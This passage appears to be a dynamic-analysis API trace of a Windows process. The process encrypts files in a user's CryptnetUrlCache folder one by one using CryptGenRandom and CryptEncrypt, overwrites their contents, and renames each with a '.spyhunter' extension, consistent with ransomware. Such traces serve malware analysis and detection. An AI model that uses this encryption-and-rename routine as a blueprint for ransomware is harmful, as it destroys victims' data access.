lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.697] WriteFile (in: hFile=0x178, lpBuffer=0x248ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x248ee04*, lpNumberOfBytesWritten=0x248edc4*=0x4, lpOverlapped=0x0) returned 1 [0152.698] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edc4*=0x30, lpOverlapped=0x0) returned 1 [0152.698] CloseHandle (hObject=0x178) returned 1 [0152.698] GetProcessHeap () returned 0x2c0000 [0152.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.698] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.spyhunter") returned 161 [0152.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.spyhunter")) returned 1 [0152.718] GetProcessHeap () returned 0x2c0000 [0152.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.718] GetProcessHeap () returned 0x2c0000 [0152.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.719] GetProcessHeap () returned 0x2c0000 [0152.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1c90 | out: hHeap=0x2c0000) returned 1 [0152.719] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee08 | out: pbBuffer=0x248ee08) returned 1 [0152.719] GetProcessHeap () returned 0x2c0000 [0152.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.719] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee00*=0x30) returned 1 [0152.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.719] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0152.719] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0152.719] GetProcessHeap () returned 0x2c0000 [0152.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.720] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edc4*=0x6e3, lpOverlapped=0x0) returned 1 [0152.721] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.721] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edc4*=0x6e3, lpOverlapped=0x0) returned 1 [0152.721] GetProcessHeap () returned 0x2c0000 [0152.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.721] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.721] WriteFile (in: hFile=0x178, lpBuffer=0x248ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x248ee04*, lpNumberOfBytesWritten=0x248edc4*=0x4, lpOverlapped=0x0) returned 1 [0152.721] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edc4*=0x30, lpOverlapped=0x0) returned 1 [0152.721] CloseHandle (hObject=0x178) returned 1 [0152.722] GetProcessHeap () returned 0x2c0000 [0152.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.722] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.spyhunter") returned 161 [0152.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.spyhunter")) returned 1 [0152.722] GetProcessHeap () returned 0x2c0000 [0152.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.722] GetProcessHeap () returned 0x2c0000 [0152.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.723] GetProcessHeap () returned 0x2c0000 [0152.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0c68 | out: hHeap=0x2c0000) returned 1 [0152.723] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee00 | out: pbBuffer=0x248ee00) returned 1 [0152.723] GetProcessHeap () returned 0x2c0000 [0152.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.723] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edf8*=0x30) returned 1 [0152.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0152.723] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0152.723] GetProcessHeap () returned 0x2c0000 [0152.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.724] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edbc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.828] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.828] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edbc*=0x6e3, lpOverlapped=0x0) returned 1 [0152.830] GetProcessHeap () returned 0x2c0000 [0152.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.830] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.830] WriteFile (in: hFile=0x178, lpBuffer=0x248edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x248edfc*, lpNumberOfBytesWritten=0x248edbc*=0x4, lpOverlapped=0x0) returned 1 [0152.830] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edbc*=0x30, lpOverlapped=0x0) returned 1 [0152.830] CloseHandle (hObject=0x178) returned 1 [0152.831] GetProcessHeap () returned 0x2c0000 [0152.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.831] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.spyhunter") returned 161 [0152.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.spyhunter")) returned 1 [0152.832] GetProcessHeap () returned 0x2c0000 [0152.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.832] GetProcessHeap () returned 0x2c0000 [0152.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.832] GetProcessHeap () returned 0x2c0000 [0152.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0af0 | out: hHeap=0x2c0000) returned 1 [0152.832] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee00 | out: pbBuffer=0x248ee00) returned 1 [0152.832] GetProcessHeap () returned 0x2c0000 [0152.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.832] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edf8*=0x30) returned 1 [0152.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.833] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0152.833] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0152.833] GetProcessHeap () returned 0x2c0000 [0152.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.833] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edbc*=0x1fa, lpOverlapped=0x0) returned 1 [0152.834] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.834] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edbc*=0x1fa, lpOverlapped=0x0) returned 1 [0152.834] GetProcessHeap () returned 0x2c0000 [0152.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.834] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.834] WriteFile (in: hFile=0x178, lpBuffer=0x248edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x248edfc*, lpNumberOfBytesWritten=0x248edbc*=0x4, lpOverlapped=0x0) returned 1 [0152.834] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edbc*=0x30, lpOverlapped=0x0) returned 1 [0152.834] CloseHandle (hObject=0x178) returned 1 [0152.834] GetProcessHeap () returned 0x2c0000 [0152.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.834] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter") returned 128 [0152.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.spyhunter")) returned 1 [0152.845] GetProcessHeap () returned 0x2c0000 [0152.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.845] GetProcessHeap () returned 0x2c0000 [0152.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.845] GetProcessHeap () returned 0x2c0000 [0152.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3410 | out: hHeap=0x2c0000) returned 1 [0152.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edf8 | out: pbBuffer=0x248edf8) returned 1 [0152.846] GetProcessHeap () returned 0x2c0000 [0152.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edf0*=0x30) returned 1 [0152.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.847] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0152.847] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0152.847] GetProcessHeap () returned 0x2c0000 [0152.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.847] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edb4*=0x32d, lpOverlapped=0x0) returned 1 [0152.848] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.848] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edb4*=0x32d, lpOverlapped=0x0) returned 1 [0152.848] GetProcessHeap () returned 0x2c0000 [0152.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.848] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.848] WriteFile (in: hFile=0x178, lpBuffer=0x248edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x248edf4*, lpNumberOfBytesWritten=0x248edb4*=0x4, lpOverlapped=0x0) returned 1 [0152.848] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edb4*=0x30, lpOverlapped=0x0) returned 1 [0152.848] CloseHandle (hObject=0x178) returned 1 [0152.848] GetProcessHeap () returned 0x2c0000 [0152.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.849] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.spyhunter") returned 128 [0152.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.spyhunter")) returned 1 [0152.850] GetProcessHeap () returned 0x2c0000 [0152.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.850] GetProcessHeap () returned 0x2c0000 [0152.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.850] GetProcessHeap () returned 0x2c0000 [0152.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc31a0 | out: hHeap=0x2c0000) returned 1 [0152.850] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248edf8 | out: pbBuffer=0x248edf8) returned 1 [0152.850] GetProcessHeap () returned 0x2c0000 [0152.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.850] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248edf0*=0x30) returned 1 [0152.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0152.851] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0152.851] GetProcessHeap () returned 0x2c0000 [0152.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.851] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edb4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.852] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.852] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edb4*=0x1d7, lpOverlapped=0x0) returned 1 [0152.852] GetProcessHeap () returned 0x2c0000 [0152.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.852] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.852] WriteFile (in: hFile=0x178, lpBuffer=0x248edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x248edf4*, lpNumberOfBytesWritten=0x248edb4*=0x4, lpOverlapped=0x0) returned 1 [0152.852] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edb4*=0x30, lpOverlapped=0x0) returned 1 [0152.852] CloseHandle (hObject=0x178) returned 1 [0152.853] GetProcessHeap () returned 0x2c0000 [0152.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.853] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.spyhunter") returned 161 [0152.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 